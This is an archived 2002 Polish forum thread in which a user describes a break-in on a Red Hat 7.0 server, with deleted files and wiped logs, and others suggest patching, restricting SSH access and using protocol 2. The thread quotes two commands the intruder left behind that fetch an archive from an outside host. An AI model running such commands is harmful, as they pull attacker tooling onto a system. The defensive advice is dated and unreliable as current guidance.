TwojePC.pl © 2001 - 2024
|
|
A R C H I W A L N A W I A D O M O Ś Ć |
|
|
|
Miałem włamanie na serwer - jak rozpoznac delikwenta??? , kaszpio 16/11/02 22:20 Dzis rano wlaczam kompa i nie ma neta...wchodze przez ssh na serwer i patrze ze caly moj katalog domowy jest wyczyszczony a takze cala zawartosc www...
Wszystkie logi typu latlog i messages sa wyrzucone...
W konsoli zapamietaly sie takie dwie ostatnie komendy:
ftp mr-bomb.org
lynx www.mr-bomb.org/back.tar
ktorych ja i nikt inny na pewno nie wpisywal...
co sie stalo i co zawiodlo???
Uslugi ktore mam na serwie to ssh, postfix, www, samba, squid...
dostep dla wszystkich byl tylko dla ssh i ipop3d...
jak to mozliwe zeby ktos tak namieszal?
I jak teraz rozpoznac delikwenta...jak nie ma tych logow?
System to rh70 i ipchainsToshiba Tecra S11-124 - jak nic ktos wszedl przez ssh... , Holek 16/11/02 22:28
udez na gg 585224 to moze cos wykombinujemy - jak zwykle jestem na "czuwaniu", ale wal smialo"...here I am on The Road again..." - zawieść mogło wszystko... jedyna rada to bardzo częste , Bart 16/11/02 22:39
aktualizacje, a ssh dołanczane do RH i tym podobnych jest g... warte.- ssh... , Holek 16/11/02 22:45
ostatnio w ogole jest ch... warte. Nic tylko siedzic buqtrak i na biezaca wprowadzac mu zmiany w conf... i aktualizowac ;)
a czy to RH, czy Slack, czy inny Debian - wszystko jedno g... skoro ssh g...
isnt it ?:)"...here I am on The Road again..." - SSH? , Poke 16/11/02 22:52
Widze ze o czyms nie wiem, dlaczego ssh g... warte? Kurcze, jak bede musial wylaczyc ssh to jak mam zdalnie pracowac?09 sierpien 2008 - penitentiam agite - ja tez nie wiem... , kaszpio 16/11/02 22:53
ale na razie odcinam serwer od swiata!;-)Toshiba Tecra S11-124 - Niepotrzebnie , Yatanza 16/11/02 22:58
oni juz tego wiecej nie zrobia. Postaw sobie nowy serverek, baw sie dalej i daj spokoj z namierzaniem, bo szkoda czasu.- jacy oni? , kaszpio 16/11/02 23:13
znasz ich?;-)Toshiba Tecra S11-124
- jezeli go...warte ... , kaszpio 16/11/02 22:55
to czego uzywac do komunikacji z serwerem w necie?Toshiba Tecra S11-124 - używać komercyjnych, dobrych i bezpiecznych wersji SSH. , Bart 16/11/02 23:15
j.w.- eee tam... , Holek 16/11/02 23:35
od razu komercyjnych, uzywam openssh od dawna i zero problemow...
1. czytac buqtrak
3. stosowac to co tam zalecaja zaraz po przeczytaniu
3. goto 1"...here I am on The Road again..."
- a nie lepiej... , XTC 17/11/02 00:15
zastanowić się skąd chcemy się logować i zablokować ssh dla "wszystkich innych" ??? ... kusić tak nie będzie...Linux - Dobrze gada!! , guma 17/11/02 00:51
Dac mu wodki :))
Oczywiscie nalezy ograczniczyc hosty z ktorych mozemy sie logowac, to wystarcza na 99,99% wlamow. A z reszta to juz radzic sobie trzeba inaczej.
pozdrawiam
- noo... nie mowcie... , capri 17/11/02 01:10
ze ktos sie na super_extra_zabezpieczonego linuxa wdarl...Quidquid latine dictum sit,
altum videtur - ale nie mowimy przeciez... , Holek 17/11/02 01:35
ze na super extra zabezpieczonego ;)"...here I am on The Road again..." - hehe pewno, że nie.. , Maverick 17/11/02 03:25
bo takowego nie ma :)
- hmm.. nie ... , XCLONE 17/11/02 09:02
ktos sie wdarl na super_extra_NIE_zabezpieczonego linux :p
moj firewall moze sluzyc jako calkiem niezly wzorzec ... :>
dziwactwa sie dobijaja ... ale jeszcze nic go nie zaatakowalo na pada .. :> (tu wazelinka dla mastaha z Krakowa, ktory pomaga mi ustawiac takowe brameczki) :>>
Pozdr.
Artur S.The World HAS Changed..
:P - co tu ma wspolnego z tym firewall?!?! , kaszpio 17/11/02 09:14
poprostu wpuszczal wszystkich na porcie 22...sa zrobione konta shellowe...i nie wiem jak wyobrazasz sobie prace bez tego portu...
A zawiodlo przez moja glupote...bo myslalem ze jak mam ssh to juz ok...a tu go..no...trzeba ciagle latac dziurki i uzywac only protocol 2!;-)
Pozdrowka!Toshiba Tecra S11-124
|
|
|
|
|
All rights reserved ® Copyright and Design 2001-2024, TwojePC.PL |
|
|
|
|